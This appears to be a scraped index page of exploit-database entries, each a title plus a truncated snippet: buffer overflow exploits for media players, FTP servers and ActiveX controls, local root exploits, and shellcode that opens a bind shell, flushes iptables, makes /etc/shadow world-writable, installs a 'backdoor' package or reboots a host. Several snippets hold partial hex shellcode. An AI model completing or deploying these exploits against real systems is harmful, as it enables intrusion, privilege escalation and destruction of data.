Zoom Player Pro 3.30 (.m3u) - File Buffer Overflow Exploit (seh)

No description provided by source. ?php / Zoom Player Pro v.3.30 .m3u file buffer overflow exploit seh by Nine:Situations:Group::surfista seems the same of http://secunia.com/advisories/28214/ bug found by Luigi Auriemma no full working exploit out, so I made my test version / / //original...

AtomixMP3 <= 2.3 - (.M3U) Buffer Overflow Exploit

No description provided by source. / ======================================================================== 0-day AtomixMP3 = v2.3 Malformed M3U Buffer Overflow PoC ======================================================================== AtomixMP3 Player/Mixer fails to properly handle large fil...

linux/x86 bindport 8000 & execve iptables -F 176 bytes

No description provided by source. ; ; Title : Bindport TCP/8000 & execve iptables -F ; os : Linux x86 ; size : 176 bytes ; IP : localhost ; Port : 8000 ; Use : nc localhost 8000 ; ; Author : Jonathan Salwan ; Mail : submit AT shell-storm.org ; Web : http://www.shell-storm.org ; ; ; More shellcod...

FreeBSD 3.3 angband Buffer Overflow Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/840/info The version angband shipped with FreeBSD 3.3-RELEASE is vulnerable to a local buffer overflow attack. Since it is setgid games, a compromise of files and directories owned by group games is possible. / FreeBSD 3....

Easy FTP Server 1.7.0.11 - MKD Command Remote Buffer Overflow Exploit (Post Auth)

No description provided by source. !/usr/bin/python import socket,sys Tested on XP Pro SP2 Eng and XP Pro SP3 Eng print Easy FTP Server v1.7.0.11 MKD Remote BoF Exploit Post Authentication Author / Discovered by : Karn Ganeshen Date : July 5, 2010 KarnGaneshen aT gmail d0t com...

IWConfig Local ARGV Command Line Buffer Overflow Vulnerability (3)

No description provided by source. source: http://www.securityfocus.com/bid/8901/info A problem has been identified in the iwconfig program when handling strings on the commandline. Because of this, a local attacker may be able to gain elevated privileges. / C 2003 NrAziz polygrithmathotmailDOTco...

Linux - chmod(/etc/shadow, 0666) & exit() - 33 bytes

No description provided by source. include stdio.h / linux/x86 ; chmod/etc/shadow, 0666 & exit 33 bytes written by ka0x - ka0x01alt+64gmail.com lun sep 21 17:13:25 CEST 2009 greets: an0de, Piker, xarnuz, NullWave07, Pepelux, JosS, sch3m4, Trancek and others! / int main char shellcode = \x31\xc0 /...

hztty 2.0 - Local root exploit (Tested on Red Hat 9.0)

No description provided by source. / 0x333hztty = hztty 2.0 local root exploit more info : Debian Security Advisory DSA 385-1 note I adjusted some part of hztty's code since there were some errors. hope this will not influence exploitation : tested against Red Hat 9.0 : c0wboy@0x333 c0wboy$ gcc...

Exim <= 4.41 dns_build_reverse Local Exploit

No description provided by source. / ripped straight off iDEFENSE advisory - so lazy I just picked up GDB... bored on a weeknight : nothing to write home to mother about due to the fact that you need a local user account on a server and all you get is to read other people's emails .... not even m...

Win32 Shellcode (cmd.exe) for XP SP2 Turkish 26 Bytes

No description provided by source. / 26 Bytes Win32 Shellcode cmd.exe for XP SP2 Turkish Author: Hellcode Research || TCC The Computer Cheats http://tcc.hellcode.net memberz: celil 'karak0rsan unuver , murderkey, murat kaslioglu, bob from murderkey: I love you merve lol from karak0rsan: fuck u ys...

dislocate 1.3 - Local i386 Exploit

No description provided by source. / MasterSecuritY www.mastersecurity.fr dislocate.c - Local i386 exploit in v1.3 Secure Locate v2.3 Copyright C 2000 Michel MaXX Kaempf [email protected] Updated versions of this exploit and the corresponding advisory will be made available at:...

Linux i686 - pacman -S <package> (default package: backdoor) - 64 bytes

No description provided by source. / Title : Linux i686 - pacman -S package default package: backdoor - 64 bytes Author : Jonathan Salwan Mail : submit ! shell-storm.org Web : http://www.shell-storm.org Pacman is a software package manager, developed as part of the Arch Linux distribution. With...

freebsd/x86 execve /bin/sh 23 bytes (2)

No description provided by source. / FreeBSD 23 byte execve code. Greetz to anathema, the first who published this way of writing shellcodes. greetz to preedator marcetam [email protected] / char fbsdexecve= \x99 / cdq / \x52 / push %edx / \x68\x6e\x2f\x73\x68 / push $0x68732f6e /...

JITed exec notepad Shellcode

No description provided by source. Title: JITed exec notepad shellcode EDB-ID: CVE-ID: OSVDB-ID: Author: Alexey Sintsov Published: Verified: yes Download N/A // JIT.swf // // By Alexey Sintsov // [email protected] // [email protected] // // DSecRG - Digital Security Research Group dsecrg.com // //...

PHP 3.0.16/4.0.2 - Remote Format Overflow Exploit

No description provided by source. / PHP 3.0.16/4.0.2 remote format overflow exploit. Copyright c 2000 Field Marshal Count August Anton Wilhelm Neithardt von Gneisenau [email protected] my regards to sheib and darkx All rights reserved Pascal Boucheraine's paper was enlightening THERE IS NO...

MPlayer Lite r33064 - m3u Buffer Overflow Exploit (DEP Bypass)

No description provided by source. !/usr/bin/perl +Exploit Title: MPlayer Lite r33064 m3u Buffer Overflow ExploitDEP BYPASS +Date: 24\07\2011 +Author: C4SS!0 and h1ch4m +Software Link: http://sourceforge.net/projects/mplayer-ww/files/MPlayerRelease/Revision%2033064/mplayerliter33064.7z/download...

IRIX 6.5.x gr_osview Buffer Overflow Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/1526/info Under certain versions of IRIX, the 'grosview' command contains a buffer overflow that local attackers can exploit to gain root privileges. The grosview command produces a graphical display of memory-management...

BarCodeWiz Barcode ActiveX Control 3.29 BoF Exploit (SEH)

No description provided by source. BarCodeWiz Barcode ActiveX Control 3.29 BoF SEH Bug found: 24th July 2010 Author: loneferret Software: http://www.barcodewiz.com/ Nods to exploit-db.com Vulnerable file BarCodeWiz.dll LoadProperties method Tested on: Windows XP Professional SP3 with Internet...

linux/x86 execve("/bin/ash",0,0); 21 bytes

No description provided by source. / 21 byte execve/bin/ash,0,0; shellcode for linux x86 by zasta zasta at darkircop.org / include unistd.h include stdio.h char shellcode = \x31\xc9\xf7\xe1\x04\x0b\x52\x68 \x2f\x61\x73\x68\x68\x2f\x62\x69 \x6e\x89\xe3\xcd\x80; void code asm xor %ecx,%ecx mul %ecx...

Solaris/x86 - Sync() & reboot() & exit(0) - 48 bytes

No description provided by source. / Title: Solaris/x86 - Sync & reboot & exit0 - 48 bytes Author: Jonathan Salwan submit AT shell-storm.org Web: http://www.shell-storm.org Twitter: http://twitter.com/jonathansalwan ! Database of shellcodes: http://www.shell-storm.org/shellcode/ Date: 2010-06-07...